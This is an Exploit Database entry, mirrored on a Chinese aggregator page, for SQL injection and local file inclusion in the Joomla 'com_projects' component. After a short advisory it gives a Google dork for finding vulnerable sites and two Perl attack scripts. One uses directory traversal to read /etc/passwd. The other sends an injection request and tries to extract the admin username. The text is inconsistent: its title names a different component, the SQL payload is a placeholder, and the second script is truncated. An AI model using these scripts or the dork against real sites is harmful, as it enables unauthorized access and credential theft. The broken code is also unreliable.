Joomla! Component Projects ‘com_projects’ – SQL Injection / Local File Inclusion

• Exploit Database
• 112 阅读

• 作者： jos_ali_joe
  日期： 2010-10-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/34934/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140

  source: https://www.securityfocus.com/bid/44456/info   The &apos;com_projects&apos; component for Joomla! is prone to an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.   An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. By using directory-traversal strings to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks.   ========================================================= JoomlaComponent com_projects LFI & SQL Vulnerability =========================================================   [+]Title: JoomlaComponent com_calendrier RFI Vulnerability [+]Author : jos_ali_joe [+]Contact: josalijoe@yahoo.com [+]Home : http://josalijoe.wordpress.com/ ######################################################################## Dork : inurl:index.php?option="com_projects" ######################################################################## [ Software Information ] ######################################################################## [+] Vendor : http://www.codegravity.com/ [+] Download : http://www.joomla.org/download.html [+] version : Joomla 1.5 [+] Vulnerability : LFI and SQL Vulnerability [+] Dork : com_projects ######################################################################## [+] Exploit: LFI ==================================================================================== http://localhost/index.php?option=com_projects&controller=[ LFI ] ==================================================================================== use LWP::UserAgent; use HTTP::Request; use LWP::Simple;   print "\t\t########################################################\n\n"; print "\t\t#JoomlaComponent com_projects LFI Vulnerability#\n\n"; print "\t\t#by jos_ali_joe#\n\n"; print "\t\t########################################################\n\n";     if (!$ARGV[0]) { print "Usage: perl idc.pl [HOST]\n"; print "Example: perl idc.pl http://localhost/LFI/\n";; }   else {   $web=$ARGV[0]; chomp $web;   $iny="agregar_info.php?tabla=../../../../../../../../../../../../../../../../etc/passwd%00";   my $web1=$web.$iny; print "$web1\n\n"; my $ua = LWP::UserAgent->new; my $req=HTTP::Request->new(GET=>$web1); $doc = $ua->request($req)->as_string;   if ($doc=~ /^root/moxis ){ print "Web is vuln\n"; } else { print "Web is not vuln\n"; }   }   #################################################################################### [+] Exploit: SQL ==================================================================================== http://localhost/index.php?option=com_projects&view=project&id=[ SQL ] ==================================================================================== use IO::Socket; if(@ARGV < 1){ print " [======================================================================== [// Joomla Component com_projects SQL Injection Exploit [// Usage: idc.pl [target] [// Example: idc.pl localhost.com [// Vuln&Exp : jos_ali_joe [======================================================================== "; exit(); } #Local variables $server = $ARGV[0]; $server =~ s/(http:\/\/)//eg; $host = "http://".$server; $port = "80"; $file = "/index.php?option=com_projects&view=project&id="; print "Script <DIR> : "; $dir = <STDIN>; chop ($dir); if ($dir =~ /exit/){ print "-- Exploit Failed[You Are Exited] \n"; exit(); } if ($dir =~ /\//){} else { print "-- Exploit Failed[No DIR] \n"; exit(); } $target = "SQL Injection Exploit"; $target = $host.$dir.$file.$target; #Writing data to socket print "+**********************************************************************+\n"; print "+ Trying to connect: $server\n"; $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; print $socket "GET $target HTTP/1.1\n"; print $socket "Host: $server\n"; print $socket "Accept: * /*\n"; print $socket "Connection: close\n\n"; print "+ Connected!...\n"; #Getting while($answer = <$socket>) { if ($answer =~ /username:(.*?)pass/){ print "+ Exploit succeed! Getting admin information.\n"; print "+ ---------------- +\n"; print "+ Username: $1\n"; }   #################################################################################### Thanks : ./kaMtiEz ? ibl13Z ? Xrobot ? tukulesto ? R3m1ck ? jundab - asickboys- Vyc0d ? Yur4kha - XPanda - eL Farhatz ./ArRay ? akatsuchi ? K4pt3N ? Gameover ? antitos ? yuki ? pokeng ? ffadill - Alecs - v3n0m - RJ45 ./Kiddies ? pL4nkt0n ? chaer newbie ? andriecom ? Abu_adam ? Petimati - hakz ? Virgi ? Anharku - a17z a.k.a maho ./Me Family ATeN4 : ./N4ck0 - Aury - TeRRenJr - Rafael - aphe-aphe Greets For : ./Devilzc0de crew ? Kebumen Cyber ? Explore Crew ? Indonesian Hacker - Byroe Net - Yogyacarderlink - Hacker Newbie - Jatim Crew - Malang Cyber My Team : ./Indonesian Coder